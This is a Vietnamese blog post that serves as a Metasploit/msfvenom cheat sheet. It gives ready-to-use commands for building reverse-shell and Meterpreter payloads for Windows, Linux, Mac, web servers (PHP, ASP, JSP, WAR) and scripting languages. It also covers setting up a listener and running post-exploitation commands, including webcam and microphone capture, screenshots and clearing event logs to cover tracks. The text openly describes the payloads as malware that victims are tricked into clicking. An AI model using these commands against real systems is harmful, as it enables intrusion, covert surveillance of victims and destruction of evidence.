Payloads chắc không còn xa lạ gì với anh em hacker bởi lẻ nó là 1 dạng malware để khi user click vào chạy thì malware đó mở ra 1 cổng chờ đợi chúng ta connect đến và tấn công, đại khái đó là tạo ra 1 con viruss để xâm nhập hệ thống.
List payloads
msfvenom -lBinaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfWindows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.warScripting Payloads Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.plShellcode
Đối với shellcode thì xem bằng lệnh ‘msfvenom –help-formats’ để biết định dạng rõ ràng. Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>Handlers
Trình Metasploit sẻ dễ dàng khi nhanh chóng chờ đợi user click vào file malware và kích hoạt thông báo cho ta biết
use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -zKhi các giá trị bắt buộc được hoàn thành, lệnh sau sẽ thực thi trình xử lý của bạn - ‘msfconsole -L -r Ví dụ: Ta sử dụng exploit/multi/handler và payload windows/meterpreter/reverse_tcp để nghe ngóng, hãy nhớ thiết lập các thông số yêu cầu như bình thường nhé.
screenshot : Chụp ảnh màn hình máy tính của mục tiêu.
run webcam [option] : Điều khiển webcam mục tiêu.
run sound_recorder [option] : Ghi âm máy tính mục tiêu.
run <script> : Khởi chạy một script, nếu bạn muốn xem danh sách các script thì hãy gõ run rồi ấn 2 lần nút Tab trên bàn phím.
checkvm : Kiểm tra mục tiêu là máy ảo hay máy thật. Nếu không sử dụng được bạn có thể dùng post/windows/gather/checkvm trên Metasploit.
shell : Mở chương trình MS-DOS và điều khiển nó.
clearev : Xóa Event Log trên máy tính nạn nhân, thường dùng để xóa dấu vết sau khi tấn công.
0 Comments
Vài lời muốn nói:
* Không được nhận xét thô tục bởi mình biết các bạn là những người văn minh.
* Pass giải nén mặt định là itblognote hoặc itblognote.com nếu có Pass khác thì mình sẽ ghim trong bài viết.
* Click vào quảng cáo và chia sẻ bài viết để mình có thêm động lực viết bài nhé.